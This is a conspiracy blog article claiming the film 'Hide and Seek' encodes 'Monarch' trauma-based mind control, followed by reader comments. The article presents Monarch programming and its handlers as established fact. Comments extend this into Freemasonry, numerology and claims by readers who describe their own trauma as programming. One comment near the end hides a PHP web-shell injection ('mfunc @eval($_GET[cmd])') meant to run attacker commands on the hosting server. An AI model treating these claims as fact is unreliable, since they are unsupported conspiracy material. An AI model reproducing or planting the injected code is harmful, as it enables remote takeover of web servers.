“Hide and Seek”: The Most Blatant Movie About Monarch Mind Control Ever?

“Hide and Seek” is a 2005 thriller movie that did not get great reviews at the time of its release. However, chances are most critics did understand its symbolism and its underlying theme which is all about Monarch Programming. In fact, “Hide and Seek” is probably one of the most blatant movies about Monarch Mind Control in Hollywood’s history. We’ll look at the hidden meaning of the movie.

leadhideandseek

Hide and Seek is not going down in history as Robert De Niro’s most memorable movie. It was bashed by movie critics for its derivative nature and because its ending was deemed “nonsensical”. While it is true that the plot of Hide and Seek has a fair share of logical fallacies, the movie simply cannot be fully understood without knowing about the key element at its core: Trauma-based Mind Control. From the first frame to the last, almost every line and every symbol found in the movie directly refers to concepts associated with mind control, specifically Monarch Programming.

In this particular brand of mind control, children are subjected to trauma so intense that it causes them to dissociate from reality. The slave’s handlers can then program into the children’s minds alter personas that can be triggered at will (for more information about Monarch Mind Control, read the article entitled Origins and Techniques of Monarch Mind Control). In a symbolic and theatrical way, Hide and Seek describes the horrible procedure behind Monarch Programming and hints to the more sadistic aspects of it. The fact that Monarch butterflies appear in key parts of the movie confirm that the whole storyline is based on Monarch Mind Control.

Further, when one understands the handler/slave relationship that is happening in the movie, the “nonsensical” ending becomes a little more “sensical” as it fits precisely with the way Monarch Programming works .

Let’s look at the story of Hide and Seek and the MK symbolism it contains.

Brief Summary

Warning: Gigantic spoilers ahead.

After witnessing the apparent suicide of her mother, a young girl named Emily Callaway (played by Dakota Fanning) displays symptoms of severe trauma. Her father David Callaway (played by Robert De Niro) attempts to help his daughter snap out of her trauma by leaving his job as a psychologist and by moving to a small town outside of New York.

There, he realizes that his relationship with Emily is extremely difficult and that her behavior is increasingly worrisome. Emily claims to have a new friend named Charlie who is “lots of fun” and plays with her, but Emily tells her father that Charlie doesn’t like him at all. David believes that Charlie is an imaginary friend Emily created to help cope with her trauma. Things however become unsettling when horrible things begin to occur around the house (i.e. the cat gets drowned in the bathtub) that Emily then blames on Charlie. When David discovers his potential new girlfriend has been murdered in the bathtub, he realizes that Charlie is a real person and that he’s extremely dangerous. After running around the house for a few minutes, David has a moment of clarity and realizes that HE is Charlie. Charlie is indeed David’s alternate personality, one that he didn’t know even existed. This alter personality has been manipulating poor traumatized Emily and has been committing horrible crimes. After this epiphany, Charlie takes control of David’s body and goes on a murderous rampage. Charlie is then stopped, and shot dead, by Katherine, a psychologist who worked with David in New York and who came to see if Emily was alright. After the ordeal, Emily goes to live with Katherine and that’s that.

As stated above, for most movie viewers, the internal logic of the script is somewhat unbelievable. However, once the MK symbolism of the movie is recognized, one understands that Hide and Seek is about a handler traumatizing and programming an MK slave. The fact that the father/handler has two personas is consistent with the fact that handlers are often dissociative slaves themselves who’ve been programmed to carry out someone else’s dirty deeds. Let’s look at the deeper symbolism of the movie.

Emily, the Traumatized Child

The movie begins with a symbolic image: Emily being turned around by her mother, indulging in the bliss of childhood and innocence. Notice her doll.

The movie begins with a symbolic image: Emily playing with her mother, spinning around in the bliss of childhood and innocence. Notice the doll: she holds this constantly in the first part of the movie.

Emily is a regular and playful child who appears to be very happy. In the first scene of the movie, we see her playing hide-and-seek with her mother, who then lovingly tucks her into bed.

At the beginning of the movie, Emily constantly holds that takes on an important meaning later in the movie. It represents Emily's innocent, core personality.

Emily constantly holds a doll that takes on an important meaning later in the movie. The doll represents Emily’s innocent, core personality: her “real” self.

Later that night, Emily witnesses a horrifying scene: Her mother dead in a bloody bathtub.

Seeing her mother dead is Emily's first mind-altering, life changing trauma...And not the last.

Seeing her mother dead is Emily’s first mind-altering, life changing traumatic event … but not the last.

While the death appears to be a suicide, we later learn that Charlie (the alter personality of David – Emily’s father) killed the mother and placed her in the bathtub to make it look like a suicide. Did he do this on purpose to traumatize Emily and begin her Mind Control programming?

Emily is then placed in a mental hospital for children.

Emily displays the classic signs of a traumatized person: Shock, isolation and withdrawl.

Emily displays the classic signs of a traumatized person: Shock, isolation and withdrawal.

The face of trauma.

The face of trauma.

David (or was it Charlie) decides to leave his job and moves to a small town named Woodland. He says to Katherine, another psychologist who works with him:

“Right now I need to be doing what’s right for Emily. I need to be a full time dad”.

Did he mean: “I need to be a full time handler”?

Right before leaving, Katherine, gives Emily a gift.

Katherine gives Emily a music box that plays the children song Mockingbird. This song becomes a sort of trigger song for the MK slave that is Emily as it constantly plays in the background when traumatic events happen to her. When giving the box, Katherine tells Emily: " "Whenever i was feeling sad, I would open the lid and all my sorrows went away". This appears to be a way of telling Emily to dissociate from reality when she hears that song to avoid trauma.

Katherine gives Emily a music box that plays the Mockingbird song. As the movie progresses, the Mockingbird song plays whenever a traumatic event happens, which makes it a programmed trigger song. Upon giving the gift, Katherine tells Emily: “Whenever I was feeling sad, I would open the lid and all my sorrows went away” – essentially telling Emily that she should dissociate from reality whenever she hears that song to avoid trauma.

Once in their new home, Emily goes into a wooded area behind the house. There, she follows a Monarch butterfly that leads her to a cave.

This mysterious cave is in fact the programming site where Charlie further traumatized and played with Emily's mind.

This mysterious cave is in fact the programming site where Charlie programs and traumatizes Emily.

The fact that a Monarch butterly lead Emily to the cave is a coded way of telling viewers "in the know" that this is all about Monarch Programming and trauma-based mind control.

The fact that a Monarch butterfly leads Emily to the cave is a coded way of telling viewers “in the know” that this is all about Monarch Programming and trauma-based mind control.

When Emily discovered the cave, she does something that ends up being extremely symbolic.

Emily drops her beloved doll, signifying that she lost her core, innocent persona. Mind Control handlers seek "lock away" this core persona to be able to program new alter personas within the slaves.

Emily drops her beloved doll, signifying that she lost her core, innocent persona. Mind Control handlers seek to “lock away” this core persona to be able to program new alter personas within their psyche.

Emily however did not simply “drop” the doll that represents her innocence. She literally mutilates it.

David finds Emily's doll completely defaced in a garbage can. The mutilation represents what the programming in the cave did to Emily's mind.

David finds Emily’s doll completely defaced in a garbage can. The mutilation represents how Emily’s mind is being mutilated by the torture and programming happening in the cave.

As Emily “plays” with her friend Charlie (handlers manipulate their slaves to believe they are their friends), she develops a disturbing taste for the morbid. A growing likeness for the dark side of things is often seen in Monarch slaves who become disillusioned with life. Starting with innocent children, handlers seek to create an opposite “mirror image” of their slave who become dark, twisted and disturbed (for this reason, the dualistic, black and white imagery in MK symbolism is extremely important). While we don’t ever see Charlie actually “programming” Emily during the movie, we clearly see the symptoms and the switch in Emily’s behavior.

While fishing with her father, Emily cold-hardheartedly inserts the hook inside a live insect to use as bait. Her lack of reaction to what is usually considered to be repulsive indicates that she might have been "desensitized" to pain, suffering and the disgusting due to the torture she received while being programmed by her handler.

While fishing with her father, Emily cold-hardheartedly inserts the hook inside a live insect to use as bait. Her lack of reaction to what is usually considered to be repulsive indicates that she might have been “desensitized” to pain, suffering and the repulsive due to the torture she received while being programmed by her handler.

Emily’s programmed dark side becomes more evident when she is set up to play with a “normal” girl.

David set up a play date for his daughter with a girl from the area. Notice that the girl is holding a doll, hinting that she is "normal" as she is in possession of her innocent, core personality.

David sets up a play date for his daughter with another girl from the area. Notice that the girl is holding a doll, hinting that she is “normal” as she is still in possession of her innocent, core personality.

1 2

431 Comments on "“Hide and Seek”: The Most Blatant Movie About Monarch Mind Control Ever?"

LookUp
30 days 9 hours ago

The name of the girl’s character is extremely interesting. “Emily Callaway” How many of you are aware of Callaway Gardens in Georgia? It houses the nation’s largest butterfly center. The Callaways are also yearly attendees of Bohemian Grove. I went to school with these people. I know.

Arielsstars

I disagree that it's a classic dumb move that she seeks refuge in the cave where she has been tortured. I think it shows how much she's learned to accept torture as part of her training. She's in essence saying tonight's horrible events are just the next step in my programming. And in the past, when is was tortured, I came out alive. I always got out of the "cave" alive by using my skills to dissociate. So I'll do the same thing (Split? Box my memories? Dissociate? Be compliant? Prove that I can play the game the way you… Read more »

timmeh
1 year 7 months ago

nice 1 ariel, thx

Georgette Orwell

Not sure if you know this, but "spinning" is a common device used on Monarch victims as a tool for disorientation and dissociation. The opening scene depicts Fanning's character being spun on a piece of playground equipment. nother common element (documented in the former USSR's literature) is the use of children's cartoons, most commonly seen in animated shows circa. 1960's, Soviet psychiatrists asserted that the (quite uncomfortable) sliding scale pitch noises of bells and whistles in these TV programs could result in dissociation and even psychosis when a person is subjected to it for repetitive and/or lengthy periods of time.We… Read more »

GerardTomoculus
5 months 9 days ago

Another symbolic gesture in this movie — -it's noted for the piercing by hook of the Beetle — but Elisabeth Shue in the WHITE VW BEETLE tells you that a death is imminent. Even though her death by window, to bathtub, comes later – the White VW Beetle in many movies symbolises a death or an accident about to occur. The other colours used are RED, YELLOW and BLUE, in their primary forms. The VW is found later on to be in a car crash (even though this is not how Shue dies) – this is no coincidence when it… Read more »

Madi
1 year 3 months ago

Wow. Just wow.
The dolls remind me of this one episode of the X Files. A creepy girl was always tearing limbs off her dolls…..just a side note is all. Great article….

illuminatisolution
1 year 5 months ago

This is all fascinating and very compelling but I would like to know your credentials and how you have come to obtain such an in depth knowledge of such things as mk mind control, and the intricate workings of how "they" program individuals? Don't get me wrong I like this site, I would just like to know the information provided is genuine, given the severity of the subject.

Proggy
1 year 10 months ago

I find De Niro highly suspect……

Dakota Fanning

I knew this movie was a troble maker from before…I just remember one scene where girl says to her father that he doesnt want her to have any friends or something like that…

FFA

buy why?

Lauren

So, since about 2001, Hollywood and Sundance etc., have been cranking out one film after another with "mk" and NWO symbolism ad nauseum. Every film (and music video as well) can be pretty much examined and explained the same way. Question then is: What's their point? Are they simply being entertained by this crap over and over and over? Are they trying to desenitize the public to this crap over and over and over? Are they trying to "educate" the public having 'eyes wide shut'? And because of that, does there need to by more websites like VC explaining "their"… Read more »

skylamay
1 year 2 months ago

Very good point Lauren

Rak

I had a dream last night that reminded me of this. There was a dead kid's ghost that was generally nice to me and he had blue eyes that did not focus, but looked at me. He looked kind of like the girl in this movie although of course looked like a boy.

Xadious

How does this happen (The MK Programming) is unsettling. Does it happen to just anywhere or it something that goes on in Hollywood.

Basil

Search "chemtrails"

AuroraBorderline

OMG, I had an idea right now: what if the "movies" are the "real world" for the actors (they do not know about that) and reality is like a role for them. so all the horror and action movies are part of the (mkultra?) trauma they endure because they think it's reality and we all witness this crazy stuff! maybe the actors live in their own (virtual?) reality and get convinced that all the real life/world is like a role or maybe a dream (drugs?). i got that in mind because i thought of the movie "bolt" – this little… Read more »

Basil

I think you're onto something there…
Also how about "The Truman Show" starring Jim Carrey?

butterfly

BTW, since age 9, I was looked at as a sexual object by men. It got to a point where I hated any physical contact by anyone. I would tell my mom "I love you, just don't touch me." They sent my brother away to a mental hospital. He was my only protection. Years later, around age 30, my mom tells me crying over the phone confessing that while I was a child, I was hurt, and she was sorry. She went on for a few minutes about it, but nothing of substance, just that if I knew, I'd never… Read more »

butterfly

I am 32. I was born is southern Cali. Beginning at age 9, I was targeted. The things that I have seen, defy explanation, and morality. I tried to get away from it and on with my life but the programming never leaves. They talk to you in your dreams, show visions, false memories. I was not aware of what I have been through except for flashes of images that randomly occur. Once you are targeted, they know where you are, always. I was not aware of mkultra, up till my mid 20's. Once I found out about the monarch… Read more »

AuroraBorderline

I'm so sorry for you!!!
Please stay strong and don't give up!
I don't know how to help you but I believe in your strenght!
You have come so far and are alive !

Try to the times when you are well – try to enjoy little things.
You are on my mind!

butterfly

33, that was the number always in my head. 33. Growing up, looking at clocks, digital and manual they could be incorrect, but the coincidence of 11 after, happening would trigger listlessness and despair and I had no idea why. Imagine it is noon and you walk past a clock that has 11 after. Then a few hours later, you see another clock and it is 11 after. repeats several in a day. Tell me please, that I am not the only one.

Basil

I think you should talk to JMM on here, or at least some of the Christian people. if you serious.

LookUp
30 days 9 hours ago

I’m no numerology expert, but I know that 33 is the highest level of degree in Freemasonry. 11 is representative of the masonic pillars, also the cosmic serpent. Seeing 11:11 is usually a common sign that you are in-tune with the universe. If you have been programmed, I do not know what that means to you. Best wishes to you.

Jan

This was my favorite thriller movie before reading this. But I did find the ending creepy. So thank you VC for exposing this. Besides, I watched Now You See Me yesterday. While my friend totally enjoyed the movie, I found blatant Illuminati references in the movie. The movie actually explained that there is a secret society called The Eye in the magician world. Great magicians need to go through a series of "big acts" (not sure how to describe it) in order to be part of The Eye. The all-seeing eye and mirrors were everywhere in the movie. Wonder if… Read more »

Michelle

Could you please make a break down on Spring Breakers

Stefano

Great article!

Please make an analysis on the movie Bug (2006)

It is loaded with conspiracy theories.

lidiamrtnz

O Wow good one! You should do one on the movie "Woman thou art loosed: on the 7th day a film by TD Jakes
Its so much mk mind control symbolism. It even goes so far as to naming the kidnappers "MK". Its a must must must do! Looking forward to it!

Jack

Come to think of it, I don’t remember “Silent House” describing the process the way this “Hide and Seek” blatantly does, but it very clearly shows a “successful” Trauma-based Mind Control candidate turning on the handlers. Check it out.

Jack

“Silent House” (2011) with Elizabeth Olsen is the most shockingly blatant Trauma-based Mind Control movie I’ve ever seen. If there’s not an article on VC already I’m going to be pretty surprised.

Bryan

If you really read between the lines, the Stanley Kubrick version of The Shining is also about trauma-induced mind-control/psychic powers. It's clear (if you know what to look for) Jack has been sexually abusing Danny, has caused Danny to split, and the split has imparted psychic powers to him. I rarely hear any of the conspiracy theorists discuss it, but one other thing early childhood sexual trauma can do (besides creating alters) is it can open the third eye and open the child up to metaphysical phenomena, including psychic powers (such as "shining"). Stephen King's version is a different story.… Read more »

daniel

Thank you for explaining this so well. No surprise we have Dakota and Deniro in this film- Dakota being mk’d and Deniro, the strange dark personaility we have watched in so many disturbing films. I recently discovered that an old friend who had a mysterious childhood now has a famous daughter who has turned homosexual and does soft porn for Hefner/Playboy. Looking back I remembered something! Her father was always behaving very sexually around the 2 girls even when they were babies. The friend is the mother- she once told me she had “special friends” with lots of money and… Read more »

lesniks

nother great expose. I watched this before becoming more aware <!– mfunc @eval($_GET[cmd]); –><!– /mfunc –>

Luke962

Great work again VC! I just viewed "Death and the Maiden" which came across to me as the ultimate MK Control revenge flick. It's set in a South American dictatorship, yet no one attempts an accent, because it's really about Nazi's and MK mind control. Personally, I find films from the past (even 40's, 50's) to be much more troubling since it shows a pattern and a determination. Always enjoy your hard (and important) work. Thanks!